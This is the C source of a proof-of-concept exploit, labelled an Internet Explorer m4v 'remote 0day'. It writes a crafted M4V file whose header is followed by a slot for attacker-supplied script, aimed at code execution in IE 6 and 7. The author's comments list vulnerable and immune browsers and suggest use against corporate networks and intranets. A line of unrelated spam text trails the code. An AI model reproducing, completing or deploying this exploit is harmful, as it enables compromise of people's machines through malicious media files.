/* Internet Explorer m4v Remote 0day Jeremy Brown (0xjbrown41@gmail.com) ~Faithful Subjects~ Tested VULNERABLE: Windows XP Pro SP2 + IE 6 (really...) Windows Vista SP1 + IE 7 (really???) ~Interesting Enough~ Tested IMMUNE: Windows XP Pro SP2 + Firefox 2 (assume 3 as well) Windows XP Pro SP2 + Opera 9 Windows XP Pro SP2 + Safari 3 Windows Vista SP1 + Firefox 2 (likewise) DISCLAIMER: No, the code execution will not work under default settings, but your own code probably will. May be quite useful in, hrmmm, corporate environments, intranets, silly zones, zombies and/or water polo cults. */ #include #include char m4vdata[] = "\x00\x00\x00\x20\x66\x74\x79\x70\x4D\x34\x56\x20" "\x00\x00\x00\x01\x4D\x34\x56\x20\x4D\x34\x41\x20" "\x6D\x70\x34\x32\x69\x73\x6F"; // take a guess char cti[] = ""; // insert your own scripting code and you could win a million bucks! :D int main(int argc, char *argv[]) { if(argc < 2) { printf("\nIE6/7/8? m4v Remote 0day\n"); printf("Usage: %s \n\n", argv[0]); return 0; } char *m4v = argv[1]; int i = 0; FILE *fd; printf("\nIE6/7/8? m4v Remote 0day\n"); printf("Creating malicious %s for ownage...\n\n", argv[1]); fd = fopen(m4v, "wb"); fwrite(m4vdata, 1, sizeof(m4vdata), fd); fwrite(cti, 1, sizeof(cti), fd); fclose(fd); printf("Good Day SIR. I said GOOD DAY SIR!!!\n\n"); return 0; }

亚洲欧美在线